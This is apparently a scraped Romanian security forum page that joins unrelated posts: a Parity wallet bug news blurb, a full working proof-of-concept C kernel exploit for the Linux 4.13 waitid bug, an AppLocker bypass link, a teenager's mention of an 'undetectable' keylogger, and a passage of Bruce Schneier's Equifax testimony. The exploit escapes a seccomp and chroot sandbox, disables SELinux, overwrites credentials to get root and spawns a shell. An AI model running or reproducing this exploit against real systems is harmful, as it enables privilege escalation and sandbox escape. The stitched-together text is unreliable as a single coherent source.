Leaderboard

A critical security vulnerability in Parity multi-sig wallet got triggered on 6th November — paralyzing wallets created after the 20th July. As you may have read, Parity issued a security advisory today to inform its user about a bug that got “accidentally” triggered which resulted in freezing more than $280M worth of ETH, including $90M belonging to Parity’s Founder & Ethereum former core developer: Gavin Woods. continuare articol: https://blog.comae.io/the-280m-ethereums-bug-f28e5de43513

https://gitter.im/paritytech/parity?at=5a008ef75a1758ed0f9610d6

// Proof of concept exploit for waitid bug introduced in Linux Kernel 4.13 // By Chris Salls (twitter.com/chris_salls) // This exploit can be used to break out out of sandboxes such as that in google chrome // In this proof of concept we install the seccomp filter from chrome as well as a chroot, // then break out of those and get root // Bypasses smep and smap, but is somewhat unreliable and may crash the kernel instead // offsets written and tested on ubuntu 17.10-beta2 /* salls@ubuntu:~/x$ uname -a Linux ubuntu 4.13.0-12-generic #13-Ubuntu SMP Sat Sep 23 03:40:16 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux salls@ubuntu:~/x$ gcc poc_smap_bypass.c -lpthread -o poc salls@ubuntu:~/x$ ./poc Installed sandboxes. Seccomp, chroot, uid namespace for spray assuming task struct size is 5952 check in /sys/kernel/slab/task_struct/object_size to make sure this is right If it's wrong the exploit will fail found kernel base 0xffffffff87600000 found mapping at 0xffff8eb500000000 found mapping end at 0xffff8eb5a0000000 9999 threads created found second mapping at 0xffff8eb600000000 found second mapping end at 0xffff8eb750000000 last_mapping is 0x150000000 bytes min guess ffff8eb650000000 starting guessing this part can take up to a minute, or crash the machine :) found my task at 0xffff8eb67555dd00 joining threads part 2 start mapped 0x100000000 trying to find physmap mapping found mapping at 0xffff8eb500000000 f213000 changed to 0 page locked! detected change at 0xffff8eb658000000 physmap addr is good here we go trying to call system... # id uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),118(lpadmin),128(sambashare),1000(salls) # head /etc/shadow root:!:17447:0:99999:7::: daemon:*:17435:0:99999:7::: */ /****** overview of exploit ******** waitid uses unsafe_put_user without checking access_ok, allowing the user to give a kernel address for infop and write over kernel memory. when given invalid parameters this just writes the following 32 bit integers 0, 0, 0, _, 0, 0, 0 (the 4th element is unchanged) inside the chrome sandbox we cannot fork (can only make threads) so we can only give invalid parameters to waitid and only write 0's to kernel memory, To exploit this in the presence of smap: I start out by iteratively calling waitid until we find the kernel's base address When it's found it will not return efault error from the syscall Now, I can only write 0's at this point, so I spray 10000 threads and attempt to write 0's over the beginning of the task struct to unset the seccomp flag This part is kind of unreliable and depends on the size of the task struct which changes based on cpu. If it succceeds, I now know where the task struct is and no longer have seccomp By shifting the location of the write and using the pid of the child process, I can now write 5 consecutive arbitrary non-zero bytes. So I can create an address with this bitmask 0xffffffffff000000 Now to create data at such an address I use the physmap, a mirror of all userland pages that exists in kernel memory. Mmap a large amount of memory, try writing at various places in the physmap until we see userland memory change. Then mlock that page. With controlled data in the kernel, I use the 5 byte write described above to change our task->files to point at the controlled page. This give me control of the file operations and arbitrary read/write. From here, I remove the chroot and edit my creds to make that thread root. */ #define _GNU_SOURCE #include <stdlib.h> #include <errno.h> #include <wait.h> #include <string.h> #include <stdio.h> #include <sys/syscall.h> #include <unistd.h> #include <seccomp.h> #include <stdlib.h> #include <sys/prctl.h> #include <sys/types.h> #include <linux/filter.h> #include <fcntl.h> #include <sched.h> #include <sys/socket.h> #include <netinet/in.h> #include <netinet/ip.h> #include <stdarg.h> #include <sys/mman.h> #include <sched.h> #include <pthread.h> #include <linux/sched.h> #include <linux/futex.h> #include <limits.h> #include <sys/ioctl.h> #define PR_SET_NO_NEW_PRIVS 38 #define __NR_seccomp 317 #define SECCOMP_SET_MODE_FILTER 1 /************ task offsets *************/ // from prctl_get_seccomp #define OFFSET_OF_SECCOMP_MODE 2920 #define OFFSET_OF_SECCOMP 2928 // from ptrace_access_vm #define OFFSET_OF_PARENT 2328 // from sys_getcwd #define OFFSET_OF_FS 2784 // from __fget_light #define OFFSET_OF_FILES 2792 // from #define OFFSET_OF_NSPROXY 2800 // from do_acct_process #define OFFSET_OF_SIGNAL 2808 // from sys_getuid #define OFFSET_OF_TASK_CRED 2720 // from get_task_comm #define OFFSET_OF_COMM 2728 // from __put_task_struct #define OFFSET_OF_TASK_USAGE 72 // from keyctl_session_to_parent #define OFFSET_OF_THREAD_GROUP 2480 /******* files offsets ********/ // from fput #define OFFSET_OF_F_COUNT 56 // from free_file_rcu #define OFFSET_OF_F_CRED 144 // from file_alloc_security #define OFFSET_OF_F_SECURITY 192 // #define OFFSET_OF_F_INODE 32 /****** inode offsets *********/ #define OFFSET_OF_IFLAGS 12 // should assert nsproxy = files+8 // and fs = files-8 // since that's why we need to fix them up // nsproxy offsets #define OFFSET_OF_NS_COUNT 0 // fs offset #define OFFSET_OF_FS_COUNT 0 // cred offsets #define CRED_UID_OFF 4 #define CRED_ID_SIZE 32 #define CRED_CAP_OFF 40 #define CRED_CAP_SIZE 40 #define CRED_NS_OFF 136 #define OFFSET_OF_CRED_SECURITY 120 #define FMODE_LSEEK 4 // global offsets #define KERNEL_BASE_DEFAULT 0xFFFFFFFF81000000 // in cache_seq_next // mov rax, [rsi]; ret #define ARB_READ_GADGET_OFF (0xffffffff8109d2b2-KERNEL_BASE_DEFAULT) // in device_wakeup_attach_irq // mov [rdx], esi; ret #define ARB_WRITE_GADGET_OFF (0xffffffff810da932-KERNEL_BASE_DEFAULT) #define SELINUX_ENFORCING_OFF (0xffffffff824d1394-KERNEL_BASE_DEFAULT) #define INIT_USER_NS (0xffffffff81e508a0-KERNEL_BASE_DEFAULT) #define INIT_FS (0xffffffff81f23480-KERNEL_BASE_DEFAULT) // operations offsets in qwords #define OFFSET_LSEEK 1 #define OFFSET_IOCTL 9 // 4.13+ // where read/write data is in kernel // had to play with last 3 nibbles to get it to not crash #define start_rw_off 0x9f5fe0 // a global for the f_op in userspace unsigned long *f_op; struct PagePair { unsigned long userland_page; unsigned long kernel_page; }; unsigned long kernel_base; void do_exploit_2(unsigned long task_addr); void get_physmap(struct PagePair *pp); // global for threads #define NUM_THREAD_SPRAY 10000 pthread_t g_threads[NUM_THREAD_SPRAY]; /********** HELPERS *************/ void raw_input() { int i; printf("> "); read(0, (char*)&i, 4); } int write_file(const char* file, const char* what, ...) { char buf[1024]; va_list args; va_start(args, what); vsnprintf(buf, sizeof(buf), what, args); va_end(args); buf[sizeof(buf) - 1] = 0; int len = strlen(buf); int fd = open(file, O_WRONLY | O_CLOEXEC); if (fd == -1) { perror("open"); return 0; } if (write(fd, buf, len) != len) { close(fd); return 0; } close(fd); return 1; } static inline void native_cpuid(unsigned int *eax, unsigned int *ebx, unsigned int *ecx, unsigned int *edx) { /* ecx is often an input as well as an output. */ asm volatile("cpuid" : "=a" (*eax), "=b" (*ebx), "=c" (*ecx), "=d" (*edx) : "0" (*eax), "2" (*ecx)); } void install_mock_chrome_sandbox() { char *buffer = NULL; long length; FILE *f = fopen ("chrome_seccomp_filter", "rb"); if (f) { fseek(f, 0, SEEK_END); length = ftell (f); fseek(f, 0, SEEK_SET); buffer = malloc(length); if (buffer) { fread(buffer, 1, length, f); } fclose(f); } else { printf("couldn't open chrome_seccomp_filter\n"); exit(-1); } if (length%8 != 0) { printf("length mod 8 != 0?\n"); exit(-1); } // set up namespace int real_uid = 1000; int real_gid = 1000; int has_newuser = 1; if (unshare(CLONE_NEWUSER) != 0) { perror("unshare(CLONE_NEWUSER)"); printf("no new user...\n"); has_newuser = 0; } if (unshare(CLONE_NEWNET) != 0) { perror("unshare(CLONE_NEWUSER)"); exit(EXIT_FAILURE); } if (has_newuser && !write_file("/proc/self/setgroups", "deny")) { perror("write_file(/proc/self/set_groups)"); exit(EXIT_FAILURE); } if (has_newuser && !write_file("/proc/self/uid_map", "1000 %d 1\n", real_uid)){ perror("write_file(/proc/self/uid_map)"); exit(EXIT_FAILURE); } if (has_newuser && !write_file("/proc/self/gid_map", "1000 %d 1\n", real_gid)) { perror("write_file(/proc/self/gid_map)"); exit(EXIT_FAILURE); } // chroot if (chroot("/proc/self/fdinfo")) { perror("chroot"); exit(EXIT_FAILURE); } // remove .? // how did they remove that dir.. // set uid if (!has_newuser){ if (setgid(1000)) { perror("setgid"); exit(EXIT_FAILURE); } if (setuid(1000)) { perror("setuid"); exit(EXIT_FAILURE); } } // no new privs int res = prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0); if (res) { printf("no new privs failed? %d\n", res); } // filter struct sock_fprog prog = { .len = (unsigned short) (length/8), .filter = (void*)buffer, }; // install filter if (syscall(__NR_seccomp, SECCOMP_SET_MODE_FILTER, 0, &prog)) { perror("seccomp"); exit(-2); } printf("Installed sandboxes. Seccomp, chroot, uid namespace\n"); } // futex wrapper static int futex(void *uaddr, int futex_op, int val, const struct timespec *timeout, int *uaddr2, int val3) { return syscall(SYS_futex, uaddr, futex_op, val, timeout, uaddr, val3); } /***********EXPLOIT CODE************/ pthread_attr_t thread_attr; unsigned long get_base() { // first we try doing our arb write to find the system base address // if syscall is 0 we didn't fault unsigned long start = 0xffffffff00000000; unsigned long inc = 0x0000000000100000; unsigned long guess = start; while (guess != 0) { int res = syscall(SYS_waitid, P_ALL, 0, guess+start_rw_off, WEXITED, NULL); if (errno != 14) { printf("found kernel base 0x%lx\n", guess); kernel_base = guess; return guess; } guess += inc; } printf("failed to find base address..."); return -1; } int threads_run; int barrier2; int barrier1; unsigned long g_addr_guess; unsigned long mapping_begin; unsigned long mapping_end; int found_one = 0; void *thread_guy(void *arg) { // this thread continuously checks if the seccomp filter was removed // if so we can move onto the part 2 of the exploit // we check if the spray worked before and after each barrier while (1) { if (found_one) { syscall(SYS_exit, 0); } // wait on barrier1 int res = futex(&barrier1, FUTEX_WAIT, 0, NULL, NULL, 0); if (found_one) { syscall(SYS_exit, 0); } long curr_addr = g_addr_guess; __atomic_fetch_add(&threads_run, 1, __ATOMIC_SEQ_CST); // check if opening /dev/random does not return the error code from seccomp // it will still fail because of the chroot, but have a different error int fd = open("/dev/random", O_RDONLY); if (errno != 1) { // FOUND printf("found my task at 0x%lx\n", curr_addr); found_one = 1; do_exploit_2(curr_addr); return NULL; } // wait for barrier 2 if (found_one) { syscall(SYS_exit, 0); } futex(&barrier2, FUTEX_WAIT, 0, NULL, NULL, 0); if (found_one) { syscall(SYS_exit, 0); } __atomic_fetch_add(&threads_run, 1, __ATOMIC_SEQ_CST); } } int num_threads = 0; long spray_offset; void unseccomp() { // first we spin up a lot of threads // let's try 10k // and then we try overwriting the TIF_SECCOMP flag in the task struct int i; unsigned long curr_guess = 0xffff800000000000; int j; while(1) { // try writing int res = syscall(SYS_waitid, P_ALL, 0, curr_guess+0xfe0, WEXITED, NULL); if (errno != 14) { mapping_begin = curr_guess; printf("found mapping at %p\n", (void*)curr_guess); break; } curr_guess += 0x10000000; } // check if mapping extends higher? while(1) { curr_guess += 0x10000000; // try writing int res = syscall(SYS_waitid, P_ALL, 0, curr_guess+0xfe0, WEXITED, NULL); if (errno == 14) { printf("found mapping end at %p\n", (void*)curr_guess); mapping_end = curr_guess; curr_guess -= 0x10000000; break; } } // start threads barrier1 = 0; barrier2 = 0; for (i = 0; i < NUM_THREAD_SPRAY; i++) { num_threads = i; if(pthread_create(&g_threads[i], &thread_attr, thread_guy, NULL)) { printf("pthread create error\n"); printf("%d\n", i); break; } } printf("%d threads created\n", num_threads); /***** find the kernel heap *******/ unsigned long last_mapping_start; unsigned long last_mapping_end; unsigned long second_mapping; unsigned long second_mapping_end; usleep(100000); while(1) { curr_guess += 0x10000000; // try writing int res = syscall(SYS_waitid, P_ALL, 0, curr_guess+0xfe0, WEXITED, NULL); if (errno != 14) { printf("found second mapping at %p\n", (void*)curr_guess); //mapping_end = curr_guess; second_mapping = curr_guess; last_mapping_start = second_mapping; curr_guess -= 0x10000000; break; } } while(1) { curr_guess += 0x10000000; // try writing int res = syscall(SYS_waitid, P_ALL, 0, curr_guess+0xfe0, WEXITED, NULL); if (errno == 14) { printf("found second mapping end at %p\n", (void*)curr_guess); second_mapping_end = curr_guess; last_mapping_end = second_mapping_end; curr_guess -= 0x10000000; break; } } unsigned long third_mapping = 0; unsigned long third_mapping_end; usleep(100000); while(curr_guess < second_mapping_end+0x100000000) { curr_guess += 0x10000000; // try writing int res = syscall(SYS_waitid, P_ALL, 0, curr_guess+0xfe0, WEXITED, NULL); if (errno != 14) { printf("found third mapping at %p\n", (void*)curr_guess); third_mapping = curr_guess; last_mapping_start = third_mapping; curr_guess -= 0x10000000; break; } } if (third_mapping) { while(1) { curr_guess += 0x10000000; // try writing int res = syscall(SYS_waitid, P_ALL, 0, curr_guess+0xfe0, WEXITED, NULL); if (errno == 14) { printf("found third mapping end at %p\n", (void*)curr_guess); third_mapping_end = curr_guess; last_mapping_end = third_mapping_end; curr_guess -= 0x10000000; break; } } } /***** done finding the kernel heap *******/ /****** start overwriting from low addresses to high and hope we unset the seccomp flag ******/ // some start guess found by experimenting, could be very wrong on some systems curr_guess = last_mapping_end-0x100000000; printf("last_mapping is 0x%lx bytes\n", last_mapping_end-last_mapping_start); printf("min guess %lx\n", curr_guess); printf("starting guessing\n"); printf("this part can take up to a minute, or crash the machine :)\n"); i = 0; while(!found_one) { curr_guess += 0x800000; unsigned long guess_val = curr_guess + spray_offset; // try writing syscall(SYS_waitid, P_ALL, 0, guess_val-26, WEXITED, NULL); g_addr_guess = guess_val; // let the threads check barrier2 = 0; threads_run = 0; barrier1 = 1; futex(&barrier1, FUTEX_WAKE, INT_MAX, NULL, NULL, 0); while(threads_run < num_threads) { if (found_one) { // one of the threads is free from seccomp // wake from barriers first barrier1=1; barrier2=1; futex(&barrier1, FUTEX_WAKE, INT_MAX, NULL, NULL, 0); futex(&barrier2, FUTEX_WAKE, INT_MAX, NULL, NULL, 0); printf("joining threads\n"); for(i = 0; i < num_threads; i++) { pthread_join(g_threads[i], NULL); } printf("done joining threads\n"); sleep(1000); } usleep(10000); } // make sure threads are reset barrier2 = 1; barrier1 = 0; futex(&barrier2, FUTEX_WAKE, INT_MAX, NULL, NULL, 0); while(threads_run < num_threads*2) { if (found_one) { printf("apparently we found one sleep forever\n"); // wake from barriers first barrier1=1; barrier2=1; futex(&barrier1, FUTEX_WAKE, INT_MAX, NULL, NULL, 0); futex(&barrier2, FUTEX_WAKE, INT_MAX, NULL, NULL, 0); printf("joining threads\n"); for(i = 0; i < num_threads; i++) { pthread_join(g_threads[i], NULL); } printf("done joining threads\n"); sleep(100000); } usleep(10000); } threads_run = 0; barrier2 = 0; i += 1; } } int just_exit(void *arg) { return 0; } int done_overwrite; long new_stack[10000]; void write_5(unsigned long addr, unsigned long val) { // uses waitid with pid to write a 5 byte value // clobbers a lot of adjacent memory, mostly with 0's long fake_info[20]; if(val & 0xffffff) { printf("cannot write that val\n"); exit(-1); } //fork exit until pid is good int i = 0; for(i = 3; i < 8; i++) { int to_write = (val >> (8*i)) & 0xff; while(1) { // get pid ending in to_write //int pid = fork(); // to make super fast we clone VM instead of regular fork // int pid = syscall(SYS_clone, CLONE_VM | CLONE_CHILD_SETTID | CLONE_CHILD_CLEARTID | SIGCHLD, &new_stack[200], NULL, 0, 0); int pid = clone(just_exit, &new_stack[5000], CLONE_VM | SIGCHLD, NULL); if (!pid) { exit(0); } if ((pid & 0xff) == to_write) { syscall(SYS_waitid, P_PID, pid, addr-16+i, WEXITED, NULL); break; } else { syscall(SYS_waitid, P_PID, pid, fake_info, WEXITED, NULL); } } } } // functions for once we control ops unsigned long read_addr(unsigned long addr) { f_op[OFFSET_LSEEK] = ARB_READ_GADGET_OFF + kernel_base; return syscall(SYS_lseek, 0, addr, SEEK_SET); } void mem_read(unsigned long addr, void *buf, unsigned long bytes) { unsigned long i = 0; char *cbuf = (char*)buf; for(i = 0; i < bytes; i+= 8) { unsigned long got = read_addr(addr+i); if (i+8 > bytes) { unsigned long j = 0; for(j = i; j < bytes; j++) { cbuf[j] = (char)got&0xff; got >>= 8; } } else { *(long*)(cbuf+i) = got; } } } void write_addr4(unsigned long addr, unsigned int val) { f_op[OFFSET_IOCTL] = ARB_WRITE_GADGET_OFF+kernel_base; ioctl(0, val, addr); } void write_addr(unsigned long addr, unsigned long val) { write_addr4(addr, (unsigned int)val); write_addr4(addr+4, (unsigned int)(val>>32)); } void mem_write(unsigned long addr, void *buf, unsigned long bytes) { if (bytes < 4 || bytes % 4 != 0) { //cannot write less than 4 bytes printf("Invalid write size\n"); exit(-1); } int i = 0; char *cbuf = buf; for(i = 0; i < bytes; i+=4) { write_addr4(addr+i, *(unsigned int*)(cbuf+i)); } } void *write_5_thread(void *arg) { // constantly write to pages to keep them dirtly and "mlock" them unsigned long *aa = arg; unsigned long addr = aa[0]; unsigned long data = aa[1]; write_5(addr, data); done_overwrite = 1; } int done_rooting; void *thread_to_be_root(void *arg) { // this guy exists for copying data and becoming root while(!done_rooting) { usleep(10000); } printf("trying to call system...\n"); system("/bin/sh"); } void do_exploit_2(unsigned long task_addr) { // second part of the exploit // now that we don't have seccomp we can fork and use waitid to write up to 5 non-NULL bytes // I map a large section of memory and search for it in the physmap to find an address with 3 NULL bytes // The physmap allows us to control data from userland and bypass smap // sleep for a bit to make sure threads exit usleep(100000); // remove seccomp filter syscall(SYS_waitid, P_ALL, 0, task_addr + OFFSET_OF_SECCOMP-4, WEXITED, NULL); syscall(SYS_waitid, P_ALL, 0, task_addr + OFFSET_OF_SECCOMP_MODE, WEXITED, NULL); // verify seccomp removed for child int pid = fork(); int rand_fd = open("/dev/random", O_RDONLY); // this will fail due to chroot if (errno == 1) { printf("SECCOMP NOT ACTUALLY GONE!\n"); exit(-1); } if (!pid) { exit(0); } printf("part 2 start\n"); // First, get a physmap address in the kernel land struct PagePair pp; get_physmap(&pp); // now we have a physmap address that we know, we can create our fake files // we will set up fake files struct memset((void*)pp.userland_page, 0x41, 0x1000); unsigned long files_struct = pp.userland_page; *(int*)files_struct = 100; // count (make sure it's never freed) *(unsigned long*)(files_struct+32) = pp.kernel_page+0x100; // fdt // set up fdt unsigned long fdt = pp.userland_page+0x100; *(int*)fdt = 2; // num_files *(unsigned long*)(fdt+8) = pp.kernel_page+0x200; // fd[] // set up fd[] unsigned long fdarr = pp.userland_page+0x200; *(unsigned long*)fdarr = pp.kernel_page+0x300; // fd[0] // set up file struct unsigned long file = pp.userland_page+0x300; *(unsigned long*)(file+40) = pp.kernel_page+0x400; // f_op *(unsigned int*)(file+68) = FMODE_LSEEK; // mode *(unsigned long*)(file+OFFSET_OF_F_COUNT)=100; // never free me f_op = (unsigned long*)(pp.userland_page+0x400); // f_op pointer // need to set up IS_PRIVATE(inode)) and file->cred = task->cred to pass checks for ioctl // this is the IS_PRIVATE(inode) *(unsigned long*)(file+OFFSET_OF_F_INODE)=pp.kernel_page+0x500; // inode unsigned long inode = (unsigned long)(pp.userland_page+0x500); // inode *(unsigned int*)(inode+OFFSET_OF_IFLAGS) = 0x200; // IS_PRIVATE // write over files pointer in task struct // will overwrite signal nsproxy and fs, so we will need to fix it printf("here we go\n"); done_overwrite=0; long aa[2]; aa[0] = task_addr + OFFSET_OF_FILES; aa[1] = pp.kernel_page; pthread_t th1; // create the thread we will make root done_rooting = 0; if(pthread_create(&th1, NULL, thread_to_be_root, NULL)) { printf("pthread failed\n"); exit(-1); } // create a thread to overwrite the files in our task // this current thread can't do that because the signal will be corrupted if(pthread_create(&th1, NULL, write_5_thread, aa)) { printf("pthread failed\n"); exit(-1); } // wait for the thread to overwrite my files while(!done_overwrite) { } // I'll use lseek here to do arbitrary reads // need to set up IS_PRIVATE(inode)) and file->security = task->cred->security to pass checks for ioctl // first fix up structures in FILE // let's check another file // leak out addr of parent unsigned long parent_addr = read_addr(task_addr+OFFSET_OF_PARENT); // grab security from task cred unsigned long cred = read_addr(task_addr + OFFSET_OF_TASK_CRED); unsigned long security = read_addr(cred + OFFSET_OF_CRED_SECURITY); // fix up file->security *(unsigned long*)(file+OFFSET_OF_F_SECURITY) = security; // now have arb write through ioctl! // okay first fix up task struct // copy parent's nsproxy and set it's refcount high long parent_nsproxy = read_addr(parent_addr+OFFSET_OF_NSPROXY); write_addr(task_addr+OFFSET_OF_NSPROXY, parent_nsproxy); write_addr4(parent_nsproxy+OFFSET_OF_NS_COUNT, 0x11111111); // copy parent's fs and set it's refcount high long parent_fs = read_addr(parent_addr+OFFSET_OF_FS); write_addr(task_addr+OFFSET_OF_FS, parent_fs); write_addr4(parent_fs+OFFSET_OF_FS_COUNT, 0x11111111); // now set tasks refcount high, we don't want to free it ever either? write_addr4(task_addr+OFFSET_OF_TASK_USAGE, 0x11111); // GET ROOT // disable selinux enforcing write_addr4(kernel_base+SELINUX_ENFORCING_OFF, 0); unsigned long thread2 = read_addr(task_addr+OFFSET_OF_THREAD_GROUP)-OFFSET_OF_THREAD_GROUP; if (thread2 == task_addr) { thread2 = read_addr(task_addr+OFFSET_OF_THREAD_GROUP+8)-OFFSET_OF_THREAD_GROUP; } unsigned long signal = read_addr(thread2+OFFSET_OF_SIGNAL); write_addr(task_addr+OFFSET_OF_SIGNAL, signal); // should be able to ptrace now (it's a decent test to make sure signal is fixed // now fix up cred we want root char buf[100]; memset(buf, 0, sizeof(buf)); mem_write(cred+CRED_UID_OFF, buf, CRED_ID_SIZE); memset(buf, 0xff, sizeof(buf)); mem_write(cred+CRED_CAP_OFF, buf, CRED_CAP_SIZE); unsigned long init_ns = INIT_USER_NS+kernel_base; mem_write(cred+CRED_NS_OFF, &init_ns, 8); // is this okay // now we need to just escape the file system sandbox (chroot) unsigned long init_fs = INIT_FS+kernel_base; write_addr(thread2+OFFSET_OF_FS, init_fs); // WE ARE DONE! // signal to the other thread and sleep forever done_rooting = 1; sleep(1000000); } /***** physmap code ******/ int done_locking; char *mapping_base; void *mlock_thread(void *arg) { // constantly write to pages to keep them dirtly and "mlock" them long i; char last_val = 0; while(!done_locking) { last_val += 1; for(i = 0xfff; i < 0x10000000; i+= 0x1000) { mapping_base[i] = last_val; } } } void* mapping_changed() { long i = 0; for(i = 0; i < 0x10000000; i+= 0x1000) { if (mapping_base[i] != 0x41) { printf("%lx changed to %d\n", i, mapping_base[i]); // lock that page in if(mlock(&mapping_base[i], 0x1000)) { perror("mlock"); } printf("page locked!\n"); return &mapping_base[i]; } } return 0; } void get_physmap(struct PagePair *pp) { // mmap a large amount of memory // have one thread watch for changes, while we try overwriting it in the kernel's physmap // lock the page in when it's found unsigned long base = 0x100000000; mapping_base = (char*)base; long* a = mmap((void*)base, 0x10000000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0); if ((long)a == -1) { printf("mmap failed\n"); perror("mmap"); exit(-1); } printf("mapped %p\n", a); memset(a, 0x41, 0x10000000); done_locking = 0; int j = 0; for(j = 0; j < 4; j++) { pthread_t th1; if(pthread_create(&th1, NULL, mlock_thread, NULL)) { printf("mlock thread create error\n"); exit(0); } } // try to find it in physmap unsigned long curr_guess = mapping_begin-0x80000000; printf("trying to find physmap mapping\n"); while(1) { // try writing int res = syscall(SYS_waitid, P_ALL, 0, curr_guess+0xfe0, WEXITED, NULL); if (errno != 14) { printf("found mapping at %p\n", (void*)curr_guess); curr_guess += 0x80000000; break; } curr_guess += 0x10000000; } // try to find physmap long *locked_mapping = NULL; long *locked_kernel_mapping = NULL; while(1) { // this has 6 0's to ensure that we end up with an address containing only 5 non-zero vals curr_guess += 0x1000000; int res = syscall(SYS_waitid, P_ALL, 0, curr_guess, WEXITED, NULL); if (locked_mapping = mapping_changed()) { locked_kernel_mapping = (long*)curr_guess; printf("detected change at %p\n", (void*)curr_guess); break; } } // verify lock worked locked_mapping[0] = 0x41414141; syscall(SYS_waitid, P_ALL, 0, locked_kernel_mapping, WEXITED, NULL); syscall(SYS_waitid, P_ALL, 0, &locked_kernel_mapping[100], WEXITED, NULL); if (locked_mapping[0] != 0 || locked_mapping[100] != 0) { printf("second write didn't work..."); } printf("physmap addr is good\n"); if(pp) { pp->userland_page = (unsigned long)locked_mapping; pp->kernel_page = (unsigned long)locked_kernel_mapping; } done_locking = 1; } int main() { install_mock_chrome_sandbox(); setvbuf(stdout, NULL, _IONBF, 0); srand(time(NULL)); // set thread size smaller pthread_attr_init(&thread_attr); if(pthread_attr_setstacksize(&thread_attr, 0x10000)) { printf("set stack size error\n"); return 0; } // get cpuid info so we know size of task_struct int eax,ebx,ecx,edx; eax=0xd; ebx = ecx = edx = 0; native_cpuid(&eax, &ebx, &ecx, &edx); int xsave_size = ebx; if(xsave_size == 0x340) { spray_offset = 0x55dd00; printf("for spray assuming task struct size is 5952\n"); } else if(xsave_size == 0x440) { spray_offset = 0x5448c0; printf("for spray assuming task struct size is 6208\n"); } else { printf("unknown xsave size... exiting since I don't know have the offsets hardcoded for that task save\n"); return 0; } printf("check in /sys/kernel/slab/task_struct/object_size to make sure this is right\n"); printf("If it's wrong the exploit will fail\n"); unsigned long base = get_base(); if (base == -1) { return -1; } unseccomp(); return 0; } Download Source: exploit-db.com

O lista cu câteva zeci de metode de bypass pentru AppLocker. Se actualizează constant. Link: https://github.com/api0cradle/UltimateAppLockerByPassList

Salut! Ma numesc Iulian, am 16 ani. Interesat de domeniul programarii si al securitatii. Am cateva proiecte personale: O aplicatie C# cu ceva simplu de Logare/Inregistrare, un keylogger indetectabil(cel putin asa imi zice propriul meu antivirus) in C++, un plugin in Java facut pentru un joc. Sunt aici sa invat mai multe despre securitate.

https://energycommerce.house.gov/hearings/securing-consumers-credit-data-age-digital-commerce/ Last week, I testified before the House Energy and Commerce committee on the Equifax hack. You can watch the video here. And you can read my written testimony below. Testimony and Statement for the Record of Bruce Schneier Fellow and Lecturer, Belfer Center for Science and International Affairs, Harvard Kennedy School Fellow, Berkman Center for Internet and Society at Harvard Law School Hearing on "Securing Consumers' Credit Data in the Age of Digital Commerce" Before the Subcommittee on Digital Commerce and Consumer Protection Committee on Energy and Commerce United States House of Representatives 1 November 2017 2125 Rayburn House Office Building Washington, DC 20515 Mister Chairman and Members of the Committee, thank you for the opportunity to testify today concerning the security of credit data. My name is Bruce Schneier, and I am a security technologist. For over 30 years I have studied the technologies of security and privacy. I have authored 13 books on these subjects, including Data and Goliath: The Hidden Battles to Collect Your Data and Control Your World (Norton, 2015). My popular newsletter Crypto-Gram and my blog Schneier on Security are read by over 250,000 people. Additionally, I am a Fellow and Lecturer at the Harvard Kennedy School of Government­ -- where I teach Internet security policy -- ­and a Fellow at the Berkman Klein Center for Internet and Society at Harvard Law School. I am a board member of the Electronic Frontier Foundation, AccessNow, and the Tor Project; and an advisory board member of Electronic Privacy Information Center and VerifiedVoting.org. I am also a special advisor to IBM Security and the Chief Technology Officer of IBM Resilient. I am here representing none of those organizations, and speak only for myself based on my own expertise and experience. I have eleven main points: 1. The Equifax breach was a serious security breach that puts millions of Americans at risk. Equifax reported that 145.5 million US customers, about 44% of the population, were impacted by the breach. (That's the original 143 million plus the additional 2.5 million disclosed a month later.) The attackers got access to full names, Social Security numbers, birth dates, addresses, and driver's license numbers. This is exactly the sort of information criminals can use to impersonate victims to banks, credit card companies, insurance companies, cell phone companies and other businesses vulnerable to fraud. As a result, all 143 million US victims are at greater risk of identity theft, and will remain at risk for years to come. And those who suffer identify theft will have problems for months, if not years, as they work to clean up their name and credit rating. 2. Equifax was solely at fault. This was not a sophisticated attack. The security breach was a result of a vulnerability in the software for their websites: a program called Apache Struts. The particular vulnerability was fixed by Apache in a security patch that was made available on March 6, 2017. This was not a minor vulnerability; the computer press at the time called it "critical." Within days, it was being used by attackers to break into web servers. Equifax was notified by Apache, US CERT, and the Department of Homeland Security about the vulnerability, and was provided instructions to make the fix. Two months later, Equifax had still failed to patch its systems. It eventually got around to it on July 29. The attackers used the vulnerability to access the company's databases and steal consumer information on May 13, over two months after Equifax should have patched the vulnerability. The company's incident response after the breach was similarly damaging. It waited nearly six weeks before informing victims that their personal information had been stolen and they were at increased risk of identity theft. Equifax opened a website to help aid customers, but the poor security around that­ -- the site was at a domain separate from the Equifax domain­ -- invited fraudulent imitators and even more damage to victims. At one point, the official Equifax communications even directed people to that fraudulent site. This is not the first time Equifax failed to take computer security seriously. It confessed to another data leak in January 2017. In May 2016, one of its websites was hacked, resulting in 430,000 people having their personal information stolen. Also in 2016, a security researcher found and reported a basic security vulnerability in its main website. And in 2014, the company reported yet another security breach of consumer information. There are more. 3. There are thousands of data brokers with similarly intimate information, similarly at risk. Equifax is more than a credit reporting agency. It's a data broker. It collects information about all of us, analyzes it all, and then sells those insights. It might be one of the biggest, but there are 2,500 to 4,000 other data brokers that are collecting, storing, and selling information about us­ -- almost all of them companies you've never heard of and have no business relationship with. The breadth and depth of information that data brokers have is astonishing. Data brokers collect and store billions of data elements covering nearly every US consumer. Just one of the data brokers studied holds information on more than 1.4 billion consumer transactions and 700 billion data elements, and another adds more than 3 billion new data points to its database each month. These brokers collect demographic information: names, addresses, telephone numbers, e-mail addresses, gender, age, marital status, presence and ages of children in household, education level, profession, income level, political affiliation, cars driven, and information about homes and other property. They collect lists of things we've purchased, when we've purchased them, and how we paid for them. They keep track of deaths, divorces, and diseases in our families. They collect everything about what we do on the Internet. 4. These data brokers deliberately hide their actions, and make it difficult for consumers to learn about or control their data. If there were a dozen people who stood behind us and took notes of everything we purchased, read, searched for, or said, we would be alarmed at the privacy invasion. But because these companies operate in secret, inside our browsers and financial transactions, we don't see them and we don't know they're there. Regarding Equifax, few consumers have any idea what the company knows about them, who they sell personal data to or why. If anyone knows about them at all, it's about their business as a credit bureau, not their business as a data broker. Their website lists 57 different offerings for business: products for industries like automotive, education, health care, insurance, and restaurants. In general, options to "opt-out" don't work with data brokers. It's a confusing process, and doesn't result in your data being deleted. Data brokers will still collect data about consumers who 